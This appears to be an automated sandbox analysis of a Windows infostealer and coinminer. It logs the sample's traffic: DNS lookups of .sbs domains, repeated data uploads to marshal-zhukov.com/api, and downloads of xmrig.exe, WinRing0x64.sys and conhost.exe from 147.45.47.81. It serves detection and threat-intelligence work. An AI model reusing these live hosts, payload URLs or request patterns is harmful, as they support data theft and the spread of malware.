00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c6 06 00 00 00 10 00 00 00 08 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 68 2e 72 64 61 74 61 00 00 7c 01 00 00 00 20 00 00 00 02 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 2e 64 61 74 61 00 00 00 14 01 00 00 00 30 00 00 00 02 00 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c8 2e 70 64 61 74 61 00 00 60 00 00 00 00 40 00 00 00 02 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 49 4e 49 54 00 00 00 00 22 02 00 00 00 50 00 00 00 04 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e2 2e 72 73 72 63 00 00 00 c0 03 00 00 00 60 00 00 00 04 00 00 00 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: GET /raw/dq3hWX27 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xmrig.exe HTTP/1.1Host: 147.45.47.81Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /WinRing0x64.sys HTTP/1.1Host: 147.45.47.81Connection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
                Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49794 -> 104.102.49.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49793 -> 104.102.49.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49814 -> 104.102.49.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49802 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49803 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49818 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49883 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49839 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49887 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49904 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49915 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49914 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49867 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49816 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49934 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49926 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49835 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49945 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49903 -> 188.114.97.3:443
                Source: Network trafficSuricata IDS: 2829056 - Severity 2 - ETPRO MALWARE Observed Request for xmrig.exe in - Coinminer Download : 192.168.2.10:49995 -> 147.45.47.81:80
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.10:49789
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.10:49992
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: marshal-zhukov.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: marshal-zhukov.com
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 50Host: marshal-zhukov.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 50Host: marshal-zhukov.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2KAV9D2NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12790Host: marshal-zhukov.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2D88HYRNI1K72SRF3GJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12856Host: marshal-zhukov.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6TZPV83B7YRWQPKTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15065Host: marshal-zhukov.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QJ5YMRZZQEWVSQJUP4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15077Host: marshal-zhukov.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OHBF6EA6SQJ0AZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20415Host: marshal-zhukov.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5F4HZ8GRG97TWI5BDOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20439Host: marshal-zhukov.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=MO533PF8L53P3O0ZFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1253Host: marshal-zhukov.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CDHIRCVWEIAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1217Host: marshal-zhukov.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NN7KU9FOLCXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 554266Host: marshal-zhukov.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ZOFPZ2OSGLP84B3UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 555209Host: marshal-zhukov.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 85Host: marshal-zhukov.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 85Host: marshal-zhukov.com
                Source: global trafficHTTP traffic detected: GET /conhost.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 147.45.47.81
                Source: global trafficHTTP traffic detected: GET /conhost.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 147.45.47.81
                Source: global trafficHTTP traffic detected: GET /4Ak49WQH0GE3Nr.mp3 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: joxi.netConnection: Keep-Alive
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: GET /raw/dq3hWX27 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /conhost.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 147.45.47.81
                Source: global trafficHTTP traffic detected: GET /conhost.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 147.45.47.81
                Source: global trafficHTTP traffic detected: GET /4Ak49WQH0GE3Nr.mp3 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: joxi.netConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xmrig.exe HTTP/1.1Host: 147.45.47.81Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /WinRing0x64.sys HTTP/1.1Host: 147.45.47.81Connection: Keep-Alive
                Source: aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C129b19db70bc2b7ff2901c827e2c9472; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=41fa7ebae8880889dd65bd86; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type26214Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveThu, 14 Nov 2024 11:19:31 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
                Source: aspnet_regiis.exe, 00000007.00000003.1479681606.0000000002EA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C129b19db70bc2b7ff2901c827e2c9472; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=9ae989a2dd6201658d87e3cd; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35964Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveThu, 14 Nov 2024 11:19:28 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
                Source: aspnet_regiis.exe, 00000008.00000003.1499115102.00000000028D5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498945336.00000000028D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'no-If equals www.youtube.com (Youtube)
                Source: aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: aspnet_regiis.exe, 00000008.00000003.1499115102.00000000028D5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1498945336.00000000028D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com http equals www.youtube.com (Youtube)
                Source: global trafficDNS traffic detected: DNS query: pragapin.sbs
                Source: global trafficDNS traffic detected: DNS query: repostebhu.sbs
                Source: global trafficDNS traffic detected: DNS query: thinkyyokej.sbs
                Source: global trafficDNS traffic detected: DNS query: ducksringjk.sbs
                Source: global trafficDNS traffic detected: DNS query: explainvees.sbs
                Source: global trafficDNS traffic detected: DNS query: brownieyuz.sbs
                Source: global trafficDNS traffic detected: DNS query: rottieud.sbs
                Source: global trafficDNS traffic detected: DNS query: relalingj.sbs
                Source: global trafficDNS traffic detected: DNS query: tamedgeesy.sbs
                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                Source: global trafficDNS traffic detected: DNS query: marshal-zhukov.com
                Source: global trafficDNS traffic detected: DNS query: joxi.net
                Source: global trafficDNS traffic detected: DNS query: pastebin.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: marshal-zhukov.com
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 14 Nov 2024 11:20:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINServer: cloudflareCF-RAY: 8e269c7e1b492cbf-DFW
